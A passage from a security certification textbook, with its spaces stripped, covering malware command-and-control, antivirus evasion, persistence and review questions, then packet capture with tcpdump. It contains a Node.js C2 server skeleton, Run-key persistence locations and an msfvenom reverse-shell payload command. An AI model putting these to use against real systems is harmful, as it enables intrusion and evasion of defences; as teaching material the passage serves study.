Command-­and-­controlinfrastructureC&C1AttackerC&C2Bot1Bot2Bot3C&C3Bot4commands.Anotherwaytodothisistocreateaweb-­basedinfrastructuresotheendpointsconnecttoapreviouslyidentifiedwebservertoretrievepagesthatwouldhavecommandsfortheendpointstoacton.Thisdoesn’tmean,though,thatyouhavetostandupanApache,Nginx,orIISserverjusttoserveuppages.Therearetechnologiesthatcanmakethisquiteabiteasier.Node.jsisawaytoquicklystandupawebserverwheretheactionsarewritteninJava­Script.Node.jshasanumberoflibrariesthatcanbeusedtomakethisprocesseveneasier.Theframeworksandlibrariestakecareofalltheunderlyingprotocolexchanges,andallyouneedtodoiswritesomehigh-­levelcode.YoucouldimplementaRESTfulserviceinNode.js.RESTisRepresentationalStateTransfer,addingthecapabilitytomanagethestateofanapplicationthatHTTPdoesn’tsupport.RESTservicesuse“endpoints”topassmessagestotheserverandgetresponses.AnendpointisjustaURLthattellstheserverwhatfunctionorsetoffunctionsisbeingcalled.OntopofNode.js,youcanmakeuseoftheExpresslibrarytomanagealloftheapplicationcommunicationsforyou.Youjustcreatetheresponsestotheendpointcalls.Thiscanbedonewithahandfuloflinesofcode.Ofcourse,runningthecoderequiresyoutohaveNode.jsandthenecessarylibrariesinstalled.Inthefollowingcodelisting,youcanseethebasicoutlineofaNode.jsprogramthatcouldhandlerequestsattheendpoint/check.Addingendpointsisassimpleasaddingfunctionswiththeendpointsdefined.AntivirusSolutions 359Node.jsProgramfor RESTfulServicesvarexpress=require('express');varapp=express();varfs=require('fs');app.get('/check',function(req,res){})varserver=app.listen(8081,function(){varhost=server.address().addressvarport=server.address().portconsole.log("Serverislisteningat%son%s",host,port)})Whatyou’llseehereisanendpointthatdoesn’tactuallydoanything.Youcansendtherequestinbutnothingwillhappen.Tomakesomethinghappen,youneedtoaddcodetothefunctionthathandlesGETrequeststo/check.TheExpresslibrarycanalsohandlePOSTrequests.TotakeaPOST,youjustuseapp.postinsteadofapp.get.WhatyoucandoisrespondwithJavaScriptObjectNotation(JSON),whichconsistsofakeyorpropertyfollowedbyavalue.Thisishelpfulbecausethekey/valuepairsendupbeingessentiallyself-­documenting.YoucanaddinaJSONresponsebychangingthatapp.getfunctiontolooklikewhatyouseehere.Sendinga Responsewith Expressapp.get('/check',function(req,res){res.json({action:'email'})})Ofcourse,youdon’thavetomakeuseofNode.jstobuildyourinfrastructureifyouneedC&Cservices.It’safairlyeasywaytostandupawebserverwithapplication-­likefunctionality,butyoucouldalsowritepagesthatcouldbeputupintoawebserverthateitheralreadyexistsorcouldbeinstalled.AntivirusSolutionsAntivirusisgoingtobethebaneofexistenceforanyonewritingmalware.Fortunately,it’snotallthathardtofoolantivirusifthemalwareauthorwantstoputinalittleeffort.Keepinmindthatantivirustypicallyusesknownpropertiesofmalwaretoidentifyit.Thismaybeahashofthemalware.Togenerateadifferenthash,themalwarejustneedstochangea360 Chapter8  Malware■singlebyte.Thatsinglebytechangewillresultinacompletelydifferenthash.Malwarecanuseanumberoftechniquestogetaroundantivirus.First,anynewmalwarewon’tbeidentifiedbecausethereisn’tasignatureforituntilithasbeenanalyzedandthesignaturehasbeenaddedtothedatabasefortheantivirussoftware.Sometimes,malwarecanbepolymorphic.Thismeansithasmanyshapes.Theprogramessentiallyrewritesitselfasitpropagates,makingminormodificationsasitgoes.Thismeanseachcopycouldlookdifferent.Thiswouldrequirethemalwaretomakealterationstothebinaryfile,potentiallybywritingoutafreshcopyasitpropagates.Mosttypesofmalwarecanbepolymorphic,butittakessomeskillonthepartofthemalwareauthor.Theyneedtoknowhowtomakealterationstocopiesoftheprogramwithoutresultinginanexecutablethatwon’trun.Malwarecanusepackersandencryptorstomakeitdifficultforantivirustodetectit.Usingadifferentpackingscheme,perhapsbycompressingharderornotashard,canresultinafilethatlooksdifferentbecausethedatasectionwouldappeartobedifferent.Encryptioncoulduseadifferentkey,andthefilewouldlookdifferent.Evenincaseswhereantivirusorendpointdetectionislookingatbehaviors,droppedfilescouldhaverandomlygeneratednames.ThesameistruewithRegistrykeysandvalues.WritingfilesandRegistryvaluesasactionsaren’tespeciallytroublesome,sotheseprotectionsolutionscan’tjustidentifythoseactions.Therewouldbetoomanyalertsoncommonactions.Theyneedmorespecificdetailstolookfor.Thisisonereasonsystemsthathaveantivirussolutionsinplacecanbecomeinfectedbymalware.Acommonpieceofsoftwareusedinenterpriseenvironmentstodayisendpointdetectionandresponse(EDR).AlotofEDRsoftwareincludestheabilitytodetectmalicioussoftware.Itmaydothisbyobservinghowexecutablesoperate.Therearesomepatternsofexecutionthatmalwareuses.Malwaremayreadfromandwritetospecificregistrykeys,forinstance.Itmayworkwithinsomecommondirectories.Thesearethesortsoftechniquesnonmalicioussoftwaredoesn’tuse.Thissortofdetectioncapabilitycanbeusedtoenhancemoretraditionalmalwaredetection.PersistenceMalwareisnotaoneanddoneexercise,forthemostpart.Thisisespeciallytruewhenthepurposeofthemalwareistoofferremoteaccesstoanattacker.Theattackerwantsthemalicioussoftwaretokeeprunningacrosslogin/logoutsandreboots.Thereareseveraltechniquesanattackercanusetoensurethesoftwarealwaysruns.Startingatthebootprocess,malwaremayinstallitselftorunbeforetheoperatingsystemevenstartsup.Thisallowsittocontrolthebootprocessandensureitisinmemorybeforeanyprotectionsmaybeinplace.Pre-­bootmalwareisnotcommon,butitisoneofthemostdangerousbecauseit’shardertodetectsinceitisalreadyrunningbeforeanyanti-­malwareprogrammaystartup.Summary 361OnWindowssystems,attackersmayusetheWindowsRegistrytoaddkeysthatwillautomaticallystartsoftware.ThereareacoupleofcommonlyusedRegistrykeys.ThefirstisHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run,whichwillstartupsoftwarewhenthesystemstartsup.AnotherisHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.Thiskeyisusedtostartupaprogramwhenauserlogsin.Thisregistrykeybelongstoaspecificuser,sothemalwarewillstartonlywhenthatuserlogsin.Thismeansthemalwareislimitedtothepermissionsofthatuser.ThepreferredkeywillbetheoneunderHKEY_LOCAL_MACHINEsinceitwillrunwithmachine-­levelpermissions;however,sometimesanattackerhasonlyuser-­levelpermissions.Anothertechniqueisscheduledtasks.ThispersistencemechanismwillworkonUnix-­likeoperatingsystemsaswellasWindowssystems.OnUnix-­likesystems,cronisthefacilitythatisusedcommonlyforscheduledtasks.Theremaybedifferentimplementationsofitthatmaybecalledotherthingsbutultimately,it’scron.OnWindowssystems,thereistheatprogram.ThisworkssimilarlytoscheduledtasksonUnix-­likesystems.Yousetupaprogramtorunataspecifiedtime.OnUnix-­likesystems,youmayalsohavetasksthatrunhourly,daily,orweekly.Therearesomeothertechniquesthatcanbeusedforpersistence.Again,theMITREATT&CKFrameworklistsallknownpersistencemechanisms.Thismayincludeoperatingsystem-specifictechniques,suchastheWindowsManagementInstrumentation(WMI)eventsubscription.Othersmaybefairlyconsistentacrossoperatingsystems,suchasusingstartupscripts.Thesetechniquescangenerallybedetected,whichmeansattackersarealwayslookingfornewtechniquesforpersistence.SummaryMalwareisaseriousproblemacrosstheinformationtechnologyindustry.Itaffectsbusinessesandpeoplealike.Malwareauthorsgenerallyhavetheupperhand.Iftheywanttobeontopofthings,theycanbealwaysaheadofantivirusprograms.Thismeanstheycangetthemalwareintosystemsbeforeanyonecanprotectagainstit.Theyusuallygetalegupwithnewmalware,andtheycanalsokeepmodifyingtheirmalwaretomakeitevenhardertodetect.Thisiswheremalwareanalysiscomesin.Therearetwotypesofanalysis.Thefirstisstaticanalysis,whichcomesfromlookingatthepropertiesofthemalwareaswellastheactualcode.Youcanlookatthecompositionofthefile,includingthenumberandsizeofthesectionsofaPEfile.Staticanalysiscanalsopotentiallytellyouwhetheryouhaveapackedexecutableornot.Onewayofknowingthisislookingattheentrypointoftheapplication.Theentrypointisdeterminedatcompiletime,basedontheaddressspaceprovidedtotheprogram.Thisaddresscanbelabeledandnotjustbeanaddress.IfyouseeanentrypointnamedsomethinglikeUPX,youwillknowthatithasbeenpackedbecauseUPXisacommonpacker.Disassemblersareusefulforlookingatthecodeandalsolookingatsomepropertiesoftheexecutable.362 Chapter8  Malware■Theothertypeofanalysisisdynamic,whichmeansrunningtheprogramandlookingatwhatthemalwaredoes.Thismustbedonewithcarebecauseyoudon’twanttoinfectyourownmachine,nordoyouwanttoexposeothersystemsonyournetworktopotentialinfection.Runningmalwareinsidevirtualmachinescanhelphere,thoughsomemalwarewillknowitisrunninginsideavirtualmachineandnotfullydeploy.Youcanuseasandboxedenvironmenttoruntheprogram,andtherearesandboxesthatwillautomatetheanalysisforyou.OneoftheseisCuckooSandbox,whichcanbeinstalledonyourownhardware,ortherearesomeopenlyavailableinstallationsonline.Usingadebuggercanhelpwithdynamicinspectionbecauseyoucancontroltherunoftheprogram.Youmay,inthecourseofyourtestingofyourtargetorganization,wanttomakeuseofmalware.Becauseyouarebehavingethically,youdon’twanttouseactualmalware,whosepurposeisreallymalicious.Youmay,though,wanttoinstallbackdoorsortestwhetheroperationsstaffwilldetecttheexistenceofmalware.Youcandothisbywritingyourown,takingintoconsiderationyourtargetplatformandarchitectureaswellasotherrequirements.Pythonisapopularprogramminglanguage,butWindowssystemsmaynothaveaPythoninterpreterinstalledlikeamacOSorLinuxsystemwould.WindowswouldhavePowerShellinstalled,though.Acompiledprogram,writtenusingalanguagelikeC,wouldgenerallyworkbecauseallelementsoftheprogramcanbecompiledinratherthanrelyingonlibrariestobeinstalled.Malwarewilloftenhaveinfrastructureassociatedwithit.Youmayhaveheardofbotnets.Botnetsarecollectionsofinfectedsystemsthathavecommand-­and-­controlsystemsthatareusedtotellthebotendpointswhattheyshouldbedoing.Evenifthereisn’tanentirenetworkofcommand-­and-­controlsystems,theremaybeatleastonesystemavailableforinfectedsystemstoconnecttosoastoallowremotecontrolfromanattacker.Thisisdonebecausefirewallsgenerallyallowoutboundtrafficwhereinboundtrafficwillgetblocked.Therefore,connectionsarebestinitiatedfrominsidethenetwork.Whenconnectionsareinitiatedfromtheinside,therehastobeaserverfortheinsidesystemtoconnectto.Eveniftherearen’talotofsystems,thisisstillinfrastructure.ReviewQuestions ReviewQuestionsYoucanfindtheanswersintheappendix.1.Inabotnet,whatarethesystemsthattellindividualbotswhattodocalled?A.C2serversB.IRCserversC.HTTPserversD.ISC2servers2.Whatistheprimarydifferencebetweenawormandavirus?A.Awormusespolymorphiccode.B.Avirususespolymorphiccode.C.Awormcanself-­propagate.D.Aviruscanself-­propagate.3.Whatisoneadvantageofstaticanalysisoverdynamicanalysisofmalware?A.Malwareisguaranteedtodeploy.B.Dynamicanalysisisuntrustworthy.C.Staticanalysislimitsyourexposuretoinfection.D.Staticanalysiscanberuninvirtualmachines.4.WhatwouldyouuseVirusTotalfor?A.CheckingyoursystemforvirusesB.EndpointprotectionC.AsarepositoryofmalwareresearchD.Identifyingmalwareagainstantivirusengines5.Whataretwosectionsyouwouldcommonlyfindinaportableexecutablefile?A.TextandbinaryB.BinaryanddataC.AddressesandoperationsD.Textanddata6.Whatcouldyouusetogenerateyourownmalware?A.EmpireB.MetasploitC.RcconsoleD.IDAPro363364 Chapter8  Malware■7.Whatisthepurposeofapackerformalware?A.ToobscuretheactualprogramB.ToensurethattheprogramisallbinaryC.TocompiletheprogramintoatightspaceD.Toremovenullcharacters8.Whatistheprimarypurposeofpolymorphiccodeformalwareprograms?A.EfficiencyofexecutionB.PropagationofthemalwareC.AntivirusevasionD.Fastercompilation9.WhatwouldbeonereasonnottowritemalwareinPython?A.ThePythoninterpreterisslow.B.ThePythoninterpretermaynotbeavailable.C.Librarysupportisinadequate.D.Pythonisahardlanguagetolearn.10.WhatwouldyouuseCuckooSandboxfor?A.StaticanalysisofmalwareB.MalwaredevelopmentC.DynamicanalysisofmalwareD.Manualanalysisofmalware11.Ifyouwantedatoolthatcouldhelpwithbothstaticanddynamicanalysisofmalware,whichwouldyouchoose?A.CutterB.IDAC.PEExplorerD.MalAlyzer12.Whatisthepurposeofusingadisassembler?A.ConvertingopcodestomnemonicsB.ConvertingmnemonicstoopcodesC.TranslatingmnemonicstooperationsD.Removingtheneedforanassembler13.Whatdoesthemalwarethatisreferredtoasadropperdo?A.DropsantivirusoperationsB.DropsCPUprotectionsagainstmaliciousexecutionReviewQuestions 365C.DropsfilesthatmaybemoremalwareD.DropsthemalwareintotheRecycleBin14.WhywouldyouuseanencoderwhenyouarecreatingmalwareusingMetasploit?A.TocompilethemalwareB.ToevadeantivirusC.ToevadeuserdetectionD.Tocompressthemalware15.Ifyouweretoseethefollowingcommandinsomeone’shistory,whatwouldyouthinkhadhappened?msfvenom-­i5-­pwindows/x64/shell_reverse_tcp-­oprogramA.Apoisonpillwascreated.B.Amaliciousprogramwasgenerated.C.Existingmalwarewasencoded.D.Metasploitwasstarted.16.Whatisthedifferencebetweenavirusandransomware?A.Ransomwaremaybeavirus.B.RansomwareincludesBitcoins.C.RansomwareisgeneratedonlyinRussia.D.AvirusrunsonlyonWindowssystems.17.WhywouldsomeoneuseaTrojan?A.Itactsasmalwareinfrastructure.B.Itevadesantivirus.C.Itpretendstobesomethingelse.D.It’spolymorphic.18.Whichofthesetoolswouldbemostbeneficialwhentryingtodynamicallyanalyzemalware?A.CutterB.OllyDbgC.MetasploitD.AV-­Test19.Whichendofaclient-­servercommunicationgoesontheinfectedsystemifitiscommunicatingwithinfrastructure?__________________20.Whichofthesewouldbeareasonwhyitisbestforcommunicationstooriginatefrominsidetheinfectednetwork?A.AntivirusB.Virtualmachines366 Chapter8  Malware■C.IntrusiondetectionD.Firewall21.Whatisthetacticofallowingsoftwaretocontinuerunningacrossrebootsofasystemcalled?A.ObfuscationB.PersistenceC.DisassemblyD.Packing22.Whattoolcouldyouusetodeeplyanalyzemalicioussoftware?A.stringsB.HashingC.GhidraD.Metasploit23.Whatpracticecouldanorganizationusetoprotectitselfagainstdatalossfromransomware?A.Implementanti-­malwareB.ImplementendpointdetectionandresponseC.SweepforindicatorsofcompromiseD.Implementgoodbackuppractices24.Whatpieceofsoftwarecouldyouusetorecoverfromaransomwareattack?A.DecryptorB.EncryptorC.Anti-­malwareD.Endpointdetectionandresponse25.Whatpersistencemechanismmightallowmalwaretoprotectitselfagainstanti-­malwaresoftware?A.ScheduledtasksB.WMIeventsubscriptionsC.Pre-­bootmalwareD.HKEY_LOCAL_MACHINEregistrykeyChapter9SniffingTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Communicationonprotocols✓✓Network/wirelesssniffers✓✓TCP/IPnetworkingItusedtobethatsniffingwasanexpensiveproposition.Thereasonisthattherewasaspecialnetworkinterfacerequiredtobeabletocapturethepackets.Ontopofthatwasthesoftware.Ifyouwantedtocapturepackets,youneededspecialhardwareandsoftware,andthereweren’tmanycompaniesthatcouldsellyouthat.Thencameconsumernetworkinterfacesthatdidn’tcostafortuneandcouldforwardallpacketsupthroughtheinterfaceintotheoperatingsystem.Finally,therewasapieceofsoftwarecalledEthereal.Suddenly,gettingyourpacketscapturedwasfree.Nowthereareseveralwaystocapturepackets.Themostcommonsoftwarenowtocapturepacketsisfreelyavailable.Someofthesoftwareiscommand-­lineoriented,whichisreallyhelpfulifyouareconnectedtoasystemoverSSHorothermechanismsthatprovideonlyatext-­orientedinterface.Thissortofsoftwareisnotgreatforanalysisifyouneedtodigintothepacketcontentandseeentirestreams,nottomentionifyouwanttogodeeperwithyouranalysisandgetstatisticsandgraphs.Fortunately,thereissoftwareforthatpurpose.ItwasoncecalledEthereal,butit’scurrentlycalledWireshark,andithasalotofcapabilitiestoenabledeepanalysisofthepackets.Achallengewehavetodayisthatmostnetworksareswitched.Thismeansthenetworkisessentiallysegmented.Onlypacketsthatareaddressedtoyouinsomewaywillgetsenttoyournetworkinterface.Sincewemayhavetheabilitytoseethedataanyway,throughtheapplicationstransmittingthemessages,packetcaptureisn’tnearlyasinteresting,tojustlookatmessagestoandfromthedeviceyouareon.Weneedwaystogettherestofthetrafficonthenetworktoasystemwehavecontrolof.Fortunately,thereareseveralwayswecandothat.Wecaneventakeatargetedapproachatit,determiningexactlywhichsystemswewanttogettrafficfrom.Wealsoneedtodealwithencryption.WebtraffictodaygenerallydefaultstousingTransportLayerSecurity(TLS),whichencryptsallmessages.Thisisanissuethatischallenging,sinceoneofthepredominantprotocolsbecomesobscuredtous.Fortunately,therearesomewaysaroundthat.PacketCaptureWhyispacketcapturesoimportant?Ifyoucangettotherightplaceinthenetworktobeabletocapturethedata,youcanpotentiallygrabusernamesandpasswordsorotherauthentication/authorizationtraffic.Anattackercouldpotentiallygrabcreditcardinformationorotherpersonallyidentifiableinformation(PII)thatismarketable.DependingonthePacketCapture 369organization,therecouldalsobepersonalhealthinformation(PHI).Theremaybeotherinformationavailableonthenetworkthatcouldbeusefulasyouaremaneuveringthroughyourclient’sassets.Packetcapturingistheprocessofacquiringnetworktrafficthatisaddressedtosystemsotherthanyourown.Youcancertainlycapturepacketsthatareonlyaddressedtoyoursystem,butthat’snotespeciallyinterestingsinceyou’realreadygettingthose.Networkinterfacecards(NICs)areprogrammedtoonlyforwardframesuptotheoperatingsystemwhosedestinationMACaddressiseithertheMACaddressoftheNICorthebroadcastMACaddress(ff:ff:ff:ff:ff:ff).ToforcetheNICtoforwardallmessagesuptotheoperatingsystem,thecardhastobeputintowhatiscalledpromiscuousmode.ThisjustgetstheNICtoforwardallmessagesup,behavingpromiscuously.EachlayeroftheOpenSystemsInterconnection(OSI)modelhasadifferentnameforthechunkofdataassociatedwithit.Thisiscalledtheprotocoldataunit(PDU).Atlayer2,wherewearegrabbingthemessagesoffthenetwork,sincetheyincludethelayer2headerwithMACaddresses,thePDUiscalledaframe.Technically,wearecapturingframes.It’scalledpacketcapturing,though.ApacketisthePDUforlayer3,whichistheIPlayer.Atlayer4,TCP’sPDUisasegment,whileUDP’sisadatagram.Forourpurposes,I’llbetalkingaboutpacketcapturingunlessthereissomethingrelatedtotheMACaddressortheNIC.ThenI’llbeusingthetermframe.Oncetheoperatingsystem,reallythenetworkingstackintheoperatingsystem,hastheframes,theycanbeinterceptedbyapieceofsoftware.Oncethesoftwarehasthemessage,packetcapturingsoftwarewillparsethemessage,extractinginformationoutofeachprotocolheader.Acommand-­lineprogram,liketcpdump,whichwewillbelookingat,maydisplayinformationoutofthedifferentheaders.Youcouldalsobeusingagraphicaluserinterface(GUI),whichhasmoreoptionsforhowtodisplaytheheaderdata,aswellasthepayloaddata.Headersarethefieldsthatarespecifictotheprotocol.Theyprovidedetailsspecifictotheprotocol—­instructions,asitwere,totheprotocolonhowtobehave.Thedatathatisbeingcarriedfromoneendpointtoanotheriscalledthepayload.Thispayloadmaybebrokenupbetweenmultiplepacketsandcertainlymultipleframes.Fragmentationmaybeforcedbythemaximumtransmissionunit(MTU)atlayer2(theframelayer).Thisisonereasonit’seasiertouseaGUI-­basedprogramtoanalyzepackets,evenifwearecapturingthemwithanothertool.AprogramlikeWiresharkhelpstomakepacketanalysismucheasierthanifweweretryingtoreviewallthedetailsonthecommandline.tcpdumpFordecadesnow,Unixsystemshavehadprogramsthatcouldcapturepackets.Theprogramtcpdumpwasfirstwritteninthelate1980sandwaslaterportedtootherUniximplementations.Itisafairlyeasytousebutalsopowerfulutilitythatwasstandardizedinthelate370 Chapter9  Sniffing■1990s,pullingallthedivergentimplementationstogether.Youwillfindthistoolavailableonmost,ifnotall,LinuxdistributionsaswellasthedifferentBerkeleySoftwareDistribution(BSD)distributions.Itisacommand-­lineprogramthatcanbeusedtogiveyouanideaofwhatishappeningonthenetwork,butitcanalsobeusedtocapturetrafficandstorethattrafficinafilethatcanbeopenedlateron.Inthefollowingcodelisting,youcanseewhatittakestoruntcpdump.ThiswasdonefromaKaliLinuxsystem.Thisisallthatwouldtake.Youcanseethattheoutputshowsmostlyessentialheaderinformationabouteachpacketthathasbeencaptured.Thisisonereasonthisiscalledpacketcapturing.Youmaynoticethatallthelayer2 informationhasbeenremoved.Allyouseeintheoutputisthelayer3 information,alongwithalittlelayer4.tcpdumphasalsohelpfullyindicatedsomeofthedetailsoftheApplicationlayertraffic.Youcansee,firstofall,thatthereareDNSrequests.ThereisalookupofahostnamefromanIPaddress.Thisisapointer(PTR)recordthatissometimescalledareverselookup.tcpdumpwithNoParameters[email protected]:~#tcpdumptcpdump:verboseoutputsuppressed,use-­vor-­vvforfullprotocoldecodelisteningoneth0,link-­typeEN10MB(Ethernet),capturesize262144bytes18:48:25.045517ARP,Requestwho-­hastestwifi.heretelllocalhost.lan,length4618:48:25.046237IPquiche.lan.39988>testwifi.here.domain:58469+PTR?1.86.168.192.in-­addr.arpa.(43)18:48:25.048456IPtestwifi.here.domain>quiche.lan.39988:58469*1/0/0PTRtestwifi.here.(95)18:48:25.048594IPquiche.lan.58395>testwifi.here.domain:35036+PTR?22.86.168.192.in-­addr.arpa.(44)18:48:25.050179IPtestwifi.here.domain>quiche.lan.58395:35036*1/0/0PTRlocalhost.lan.(97)18:48:25.050311IPquiche.lan.56311>testwifi.here.domain:38920+PTR?57.86.168.192.in-­addr.arpa.(44)18:48:25.051758IPtestwifi.here.domain>quiche.lan.56311:38920*1/0/0PTRquiche.lan.(94)18:48:25.458252IP6fe80::3847:ce36:d1cd:7729.61478>ff02::c.1900:UDP,length14618:48:25.458501IPquiche.lan.56653>testwifi.here.domain:33204+PTR?c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa.(90)18:48:25.467112IPtestwifi.here.domain>quiche.lan.56653:33204NXDomain0/1/0(154)18:48:25.467781IPquiche.lan.44374>testwifi.here.domain:6986+PTR?9.2.7.7.d.c.1.d.6.3.e.c.7.4.8.3.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa.(90)PacketCapture 37118:48:25.488710IPtestwifi.here.domain>quiche.lan.44374:6986NXDomain0/1/0(154)Oneoftheissueswithtcpdump,whichyoucanseeintheprecedingcode,isthatbydefaultitresolvesallnumericaddressestoonesthataremorehuman-­friendly.Thehostnamesandalsotheserviceportsareresolvedtonamesfromnumericaddresses.Thesecondline,forinstance,showsthatthedestinationaddressistestwifi.here,andtheportiscalleddomain.Thefulladdressislistedintcpdumpasw.x.y.z.p,wherew.x.y.zistheIPaddressandpistheportnumber.So,whenweseetestwifi.here.domainhere,testwifi.hereisthehostname,resolvedfromtheIPaddress,anddomainistheserviceport.Thistellsusit’saDNSrequest.ManyoftheDNSrequestsyouseearearesultofapacketthathascomein.You’llseetheDNSrequestshowbeforethepacketbecauseinordertodisplaythepacket,theDNSrequesthastobeissuedandcomeback.Youcaneasilychangethisbehavior,sincetheDNSrequestscangetverynoisyandit’shardtoweedyourwaythroughtogettothetrafficyoureallywanttosee.Thisisdonebyjustadding-­ntothecommandline.Whatyouendupwithissomethinglikeyouseehere.tcpdumpwithNoNameResolution[email protected]:~#tcpdump-­ntcpdump:verboseoutputsuppressed,use-­vor-­vvforfullprotocoldecodelisteningoneth0,link-­typeEN10MB(Ethernet),capturesize262144bytes20:42:16.326940IP192.168.86.210.40608>239.255.255.250.1900:UDP,length55820:42:16.587114IP192.168.86.210.40608>239.255.255.250.1900:UDP,length54620:42:16.703469IP192.168.86.24.5353>224.0.0.251.5353:0[5a][5q][1au]PTR(QM)?_homekit._tcp.local.PTR(QM)?_companion-­link._tcp.local.TXT(QM)?9EA05B22-­BBCC-­5F9C-­9C4B-­10A7538DAAD9._homekit._tcp.local.TXT(QU)?milobloom(2)._companion-­link._tcp.local.PTR(QM)?_sleep-­proxy._udp.local.(282)0:42:16.704314IP6fe80::10ba:d862:9623:e420.5353>ff02::fb.5353:0[5a]2[5q][1au]PTR(QM)?_homekit._tcp.local.PTR(QM)?_companion-­link._tcp.local.TXT(QM)?9EA05B22-­BBCC-­5F9C-­9C4B-­10A7538DAAD9._homekit._tcp.local.TXT(QU)?milobloom(2)._companion-­link._tcp.local.PTR(QM)?_sleep-­proxy._udp.local.(282)20:42:16.832644IP192.168.86.210.40608>239.255.255.250.1900:UDP,length53620:42:16.845825IP192.168.86.46.5353>224.0.0.251.5353:0*-­[0q]1/0/1(Cacheflush)TXT"si=AAB36E20-­CDBD-­4E60-­BEEB-­1BC0A3AB8E2D"(141)20:42:16.846030IP6fe80::1cbd:790c:b9f2:aeb0.5353>ff02::fb.5353:0*-­[0q]1/0/1(Cacheflush)TXT"si=AAB36E20-­CDBD-­4E60-­BEEB-­1BC0A3AB8E2D"(141)372 Chapter9  Sniffing■0:42:16.885944IP192.168.86.49.5353>224.0.0.251.5353:0*-­[0q]21/0/1(Cacheflush)TXT"rpBA=AC:C5:14:0E:E0:35""rpAD=c77102094021""rpHI=f27b7868fd6f""rpHN=ce75eb6a989e""rpVr=164.16""rpHA=ae260764c13d"(192)20:42:16.885964IP6fe80::1882:675c:7bdd:2de3.5353>ff02::fb.5353:0*-­[0q]1/0/1(Cacheflush)TXT"rpBA=AC:C5:14:0E:E0:35""rpAD=c77102094021""rpHI=f27b7868fd6f""rpHN=ce75eb6a989e""rpVr=164.16""rpHA=ae260764c13d"(192)Muchofwhatweseeisfairlystraightforward,thoughitmayormaynotbeespeciallyuseful.Asanexample,thefirstcapturedpacketisanIPpacket.Ittellsusthatrightafterthetimestamp.Thenweseethesourceaddressfollowedby>,showingthedirectionandthenthedestinationaddress.ThistellsusthatthepacketisUDPandthelengthis558.WhatwecanalsotellthereisthattheUDPdatagramisthesimpleservicediscoveryprotocol(SSDP),partofuniversalplugandplay(UPnP).Wecantellthisevenwithouttheassistanceoftcpdumpbyjustlookingupthedestinationportnumber,ifwedon’thappentoknowthat1900isaUPnPport.Thesourceportforthedatagramisjustanephemeralport,assignedbytheoperatingsystemwhenthemessageissentoutonthenetwork.Youmayhavenoticedthattheuserloggedintothesystemisroot.Becausewehavetosetaparameterinthehardware,wehavetoruntcpdumpasanadministrativeuser.OnLinux,thisisroot.OnWindows,itwouldbeanyoneintheAdministratorsgrouporanothergroupthathadpermissionstointerfacewiththenetworkhardwarelikethat.Wedon’thavetolivewithjustthedefaultlevelofdetail.Wecanalsoaskformoredetailaboutthepacketsthathavebeencaptured.Therearemultiplelevelsofverbositythatwecanrequestoftcpdump.Togetmoreverbose,weadd-­vtothecommandline.Ifwewantevenmoredetailthanthat,weuse-­vvandthen-­vvv.Inthefollowinglisting,youcanseeatcpdumpcapturewith-­vvasacommand-­lineparametertogetadditionaldetails.Additionally,thereisaparametersettingthesnapshotlengthto0.Inpractice,thissetsthenumberofbytesperpacketto262,144,whichisthedefaultsetting.Thiswasn’talwaysthecase.Itwasoncethecasethatthesnapshotlengthwasveryshort,sotogetcompletepackets,youhadtotelltcpdumpnottolimitthenumberofbytescaptured.tcpdumpCapturingwithAdditionalVerbosity[email protected]:~#tcpdump-­vv-­s0tcpdump:listeningoneth0,link-­typeEN10MB(Ethernet),capturesize262144bytes10:40:27.047708IP(tos0x0,ttl1,id48781,offset0,flags[DF],protoUDP(17),length228)PacketCapture 373samsung.lan.8001>st-­routers.mcast.net.8001:[udpsumok]UDP,length2000:40:27.048568IP(tos0x0,ttl64,id64646,offset0,flags[DF],protoUDP1(17),length68)quiche.lan.45867>testwifi.here.domain:[badudpcksum0x2dcd-­>0x690e!]26697+PTR?7.0.0.224.in-­addr.arpa.(40)10:40:27.068536IP(tos0x0,ttl64,id16931,offset0,flags[DF],protoUDP(17),length102)testwifi.here.domain>quiche.lan.45867:[udpsumok]26697q:PTR?7.0.0.224.in-­addr.arpa.1/0/07.0.0.224.in-­addr.arpa.PTRst-­routers.mcast.net.(74)10:40:27.068803IP(tos0x0,ttl64,id64650,offset0,flags[DF],protoUDP(17),length72)quiche.lan.46802>testwifi.here.domain:[badudpcksum0x2dd1-­>0x7eb6!]42424+PTR?22.86.168.192.in-­addr.arpa.(44)10:40:27.070769IP(tos0x0,ttl64,id16932,offset0,flags[DF],protoUDP(17),length123)testwifi.here.domain>quiche.lan.46802:[udpsumok]42424*q:PTR?22.86.168.192.in-­addr.arpa.1/0/022.86.168.192.in-­addr.arpa.PTRsamsung.lan.(95)10:40:27.070930IP(tos0x0,ttl64,id64651,offset0,flags[DF],protoUDP(17),length71)quiche.lan.49820>testwifi.here.domain:[badudpcksum0x2dd0-­>0x05f9!]46654+PTR?1.86.168.192.in-­addr.arpa.(43)10:40:27.072770IP(tos0x0,ttl64,id16933,offset0,flags[DF],protoUDP(17),length123)testwifi.here.domain>quiche.lan.49820:[udpsumok]46654*q:PTR?1.86.168.192.in-­addr.arpa.1/0/01.86.168.192.in-­addr.arpa.PTRtestwifi.here.(95)10:40:27.072857IP(tos0x0,ttl64,id64652,offset0,flags[DF],protoUDP(17),length72)quiche.lan.55520>testwifi.here.domain:[badudpcksum0x2dd1-­>0x3ef4!]48745+PTR?57.86.168.192.in-­addr.arpa.(44)10:40:27.170687STP802.1d,Config,Flags[none],bridge-­id7000.2c:08:8c:1c:3b:db.8001,length43message-­age0.00s,max-­age20.00s,hello-­time1.00s,forwarding-­delay4.00sroot-­id7000.2c:08:8c:1c:3b:db,root-­pathcost0Withdefaulttcpdumpsettings,yougettheIPheaderinformationwhereit’srelevanttothepacket—­meaningfieldsofsubstanceareset.Whenyouaddverbosity,yougetdetailsaboutthelayer4headers.IfyoulookatanyoftheUDPpackets,youwillseethatthereisanotesayingthechecksumisokay,meaningtcpdumpperformedthecalculationofthechecksumonthemessageandgotthesamevalueastheoneinthepacket.InthecaseofTCP374 Chapter9  